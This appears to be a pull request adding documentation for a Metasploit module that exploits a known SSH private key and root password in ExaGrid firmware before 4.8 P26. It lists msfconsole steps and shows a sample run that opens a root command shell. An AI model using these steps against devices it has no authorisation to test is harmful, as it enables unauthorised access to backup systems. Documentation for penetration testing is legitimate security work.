### PR TITLE
exagrid_known_privkey docs

### DIFF
--- a/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md
+++ b/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md
@@ -1,0 +1,29 @@
+## Vulnerable Application
+
+  ExaGrid devices having a firmware before version 4.8 P26 contain a known ssh private key, and root password
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Start msfconsole
+  2. Do: `use exploit/linux/ssh/exagrid_known_privkey`
+  3. Do: `set rhost <ip>`
+  4. Do: `exploit`
+  5. You should get a shell.
+
+## Scenarios
+
+This is a run against a known vulnerable ExaGrid device.
+```
+msf > use exploit/linux/ssh/exagrid_known_privkey
+msf exploit(exagrid_known_privkey) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(exagrid_known_privkey) > run
+
+[+] Successful login
+[*] Command shell session 3 opened (140.172.223.184:39269 -> 1.2.3.4:22) at 2016-07-23 10:03:19 -0400
+
+ExaGrid diagnostic tools are available in this shell.
+02:05:49 up 12 days, 9:12, 0 users, load average: 3.32, 2.88, 9.21
+```

--- a/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md
+++ b/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md
@@ -4,8 +4,6 @@
 
 ## Verification Steps
 
-  Example steps in this format:
-
   1. Start msfconsole
   2. Do: `use exploit/linux/ssh/exagrid_known_privkey`
   3. Do: `set rhost <ip>`


### PR DESCRIPTION
Adds docs for exagrid known ssh privatekey exploit.
## Verification
1. [x] `msfconsole`
2. [x] `use exploit/linux/ssh/exagrid_known_privkey`
3. [x] `info -d`
